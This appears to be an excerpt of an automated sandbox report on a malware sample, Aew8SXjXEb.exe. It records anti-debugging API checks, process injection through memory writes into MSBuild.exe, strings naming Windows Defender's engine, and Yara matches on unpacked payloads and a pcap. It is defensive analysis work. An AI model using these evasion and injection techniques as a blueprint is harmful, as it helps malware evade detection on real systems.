Code function: 1_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
1_2_0041C03D |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00622003 mov edi, dword ptr fs:[00000030h] |
0_2_00622003 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0063A64C mov eax, dword ptr fs:[00000030h] |
0_2_0063A64C |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00666628 mov eax, dword ptr fs:[00000030h] |
0_2_00666628 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00630F2E mov ecx, dword ptr fs:[00000030h] |
0_2_00630F2E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_00419750 mov eax, dword ptr fs:[00000030h] |
1_2_00419750 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00627610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00627610 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00627922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00627922 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0062DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_0062DA73 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00627AAF SetUnhandledExceptionFilter, |
0_2_00627AAF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
1_2_0041AD48 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_0041CEEA SetUnhandledExceptionFilter, |
1_2_0041CEEA |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
1_2_0041B33A |
Source: Yara match |
File source: Process Memory Space: Aew8SXjXEb.exe PID: 6032, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 |
Jump to behavior |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EF7008 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetACP,IsValidCodePage,GetLocaleInfoW, |
0_2_0063C085 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetLocaleInfoW, |
0_2_0063622B |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: EnumSystemLocalesW, |
0_2_0063C372 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: EnumSystemLocalesW, |
0_2_0063C327 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: EnumSystemLocalesW, |
0_2_0063C40D |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
0_2_0063C498 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetLocaleInfoW, |
0_2_0063C6EB |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_0063C814 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetLocaleInfoW, |
0_2_0063C91A |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
0_2_0063C9E9 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: EnumSystemLocalesW, |
0_2_00635D7F |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00627815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
0_2_00627815 |
Source: Amcache.hve.6.dr |
Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe |
Source: Amcache.hve.6.dr |
Binary or memory string: msmpeng.exe |
Source: Amcache.hve.6.dr |
Binary or memory string: c:\program files\windows defender\msmpeng.exe |
Source: Amcache.hve.6.dr |
Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe |
Source: Amcache.hve.6.dr |
Binary or memory string: MsMpEng.exe |
Source: Yara match |
File source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.Aew8SXjXEb.exe.64dad8.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.Aew8SXjXEb.exe.620000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR |
Source: Yara match |
File source: dump.pcap, type: PCAP |